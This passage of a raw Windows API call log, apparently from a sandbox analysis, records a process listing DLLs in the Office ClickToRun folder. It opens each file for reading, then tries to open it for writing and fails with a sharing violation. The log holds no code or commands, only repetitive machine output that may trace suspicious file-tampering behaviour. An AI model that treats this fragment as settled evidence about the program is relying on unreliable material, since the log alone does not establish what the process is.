hHeap=0x20000) returned 1 [0079.252] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0079.252] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0079.252] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0079.252] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0079.252] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0079.252] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0079.252] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0079.252] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0079.252] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0079.252] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0079.252] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0079.252] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0079.252] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0079.252] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0079.252] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0079.252] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0079.252] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0079.252] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0079.252] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0079.252] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.252] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.252] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.253] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.253] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0079.253] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0079.253] AreFileApisANSI () returned 1 [0079.253] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso30win32client.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso30win32client.dll", lpUsedDefaultChar=0x0) returned 79 [0079.253] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cf50 [0079.253] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.253] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.253] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0079.253] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0079.253] AreFileApisANSI () returned 1 [0079.253] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 79 [0079.253] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9e) returned 0x2e430 [0079.253] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x2e430, cchWideChar=79 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso30win32client.dll") returned 79 [0079.253] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso30win32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso30win32client.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0079.253] GetFileType (hFile=0x430) returned 0x1 [0079.253] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0079.253] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0079.254] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0079.254] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0079.254] CloseHandle (hObject=0x430) returned 1 [0079.254] AreFileApisANSI () returned 1 [0079.254] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 79 [0079.254] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9e) returned 0x2e430 [0079.254] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x2e430, cchWideChar=79 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso30win32client.dll") returned 79 [0079.254] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso30win32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso30win32client.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0079.254] GetLastError () returned 0x20 [0079.254] GetLastError () returned 0x20 [0079.254] SetLastError (dwErrCode=0x20) [0079.254] GetLastError () returned 0x20 [0079.254] SetLastError (dwErrCode=0x20) [0079.254] GetLastError () returned 0x20 [0079.255] SetLastError (dwErrCode=0x20) [0079.255] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0079.255] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0079.255] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0079.255] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0079.255] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.255] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.255] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80bfccf1, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80bfccf1, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xb7179d00, ftLastWriteTime.dwHighDateTime=0x1d0d7a8, nFileSizeHigh=0x0, nFileSizeLow=0x307ac0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="mso40uires.dll", cAlternateFileName="MSO40U~1.DLL")) returned 1 [0079.255] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0079.255] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0079.255] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0079.255] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0079.255] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0079.255] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0079.255] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0079.255] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0079.255] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0079.255] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0079.255] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0079.255] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0079.255] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0079.255] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0079.255] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0079.255] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0079.255] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0079.255] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e580 [0079.255] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0079.255] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0079.255] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e580 | out: hHeap=0x20000) returned 1 [0079.255] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0079.255] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0079.255] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0079.255] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.255] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.255] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.255] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.256] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0079.256] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0079.256] AreFileApisANSI () returned 1 [0079.256] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uires.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uires.dll", lpUsedDefaultChar=0x0) returned 73 [0079.256] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d528 [0079.256] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.256] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.256] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0079.256] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0079.256] AreFileApisANSI () returned 1 [0079.256] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0079.256] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85080 [0079.256] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x85080, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uires.dll") returned 73 [0079.256] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uires.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso40uires.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0079.256] GetFileType (hFile=0x430) returned 0x1 [0079.256] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85080 | out: hHeap=0x20000) returned 1 [0079.256] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0079.257] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0079.257] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0079.257] CloseHandle (hObject=0x430) returned 1 [0079.257] AreFileApisANSI () returned 1 [0079.257] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0079.257] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x858a0 [0079.257] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x858a0, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uires.dll") returned 73 [0079.257] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uires.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso40uires.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0079.257] GetLastError () returned 0x20 [0079.257] GetLastError () returned 0x20 [0079.257] SetLastError (dwErrCode=0x20) [0079.257] GetLastError () returned 0x20 [0079.257] SetLastError (dwErrCode=0x20) [0079.258] GetLastError () returned 0x20 [0079.258] SetLastError (dwErrCode=0x20) [0079.258] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x858a0 | out: hHeap=0x20000) returned 1 [0079.258] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0079.258] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0079.258] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d528 | out: hHeap=0x20000) returned 1 [0079.258] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.258] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.258] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80c22f4a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80c22f4a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x10cc9700, ftLastWriteTime.dwHighDateTime=0x1d0d7aa, nFileSizeHigh=0x0, nFileSizeLow=0x8e6060, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="mso40uiwin32client.dll", cAlternateFileName="MSO40U~2.DLL")) returned 1 [0079.258] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0079.258] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0079.258] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0079.258] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0079.258] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0079.258] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0079.258] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0079.258] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0079.258] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0079.258] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0079.258] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0079.258] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0079.258] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0079.258] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0079.258] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0079.258] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0079.258] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0079.258] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0079.258] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0079.258] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e580 [0079.258] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0079.258] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0079.258] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e580 | out: hHeap=0x20000) returned 1 [0079.258] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0079.259] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x812a0 [0079.259] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0079.259] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.259] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.259] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.259] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.259] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x812a0 | out: hHeap=0x20000) returned 1 [0079.259] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0079.259] AreFileApisANSI () returned 1 [0079.259] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uiwin32client.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uiwin32client.dll", lpUsedDefaultChar=0x0) returned 81 [0079.259] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0079.259] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.259] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.259] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0079.259] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0079.259] AreFileApisANSI () returned 1 [0079.259] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 81 [0079.259] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa2) returned 0x5f428 [0079.259] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x5f428, cchWideChar=81 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uiwin32client.dll") returned 81 [0079.259] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uiwin32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso40uiwin32client.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0079.260] GetFileType (hFile=0x430) returned 0x1 [0079.260] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f428 | out: hHeap=0x20000) returned 1 [0079.260] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0079.260] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0079.260] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0079.260] CloseHandle (hObject=0x430) returned 1 [0079.260] AreFileApisANSI () returned 1 [0079.260] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 81 [0079.261] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa2) returned 0x5f798 [0079.261] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x5f798, cchWideChar=81 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uiwin32client.dll") returned 81 [0079.261] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uiwin32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso40uiwin32client.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0079.261] GetLastError () returned 0x20 [0079.261] GetLastError () returned 0x20 [0079.261] SetLastError (dwErrCode=0x20) [0079.261] GetLastError () returned 0x20 [0079.261] SetLastError (dwErrCode=0x20) [0079.261] GetLastError () returned 0x20 [0079.261] SetLastError (dwErrCode=0x20) [0079.261] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0079.261] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0079.261] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0079.261] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0079.261] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.261] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.261] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x808dbb6b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x808dbb6b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x11fdc400, ftLastWriteTime.dwHighDateTime=0x1d0d7aa, nFileSizeHigh=0x0, nFileSizeLow=0xee60, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="msointl30.en-us.dll", cAlternateFileName="MSOINT~1.DLL")) returned 1 [0079.261] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0079.261] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0079.261] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0079.261] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 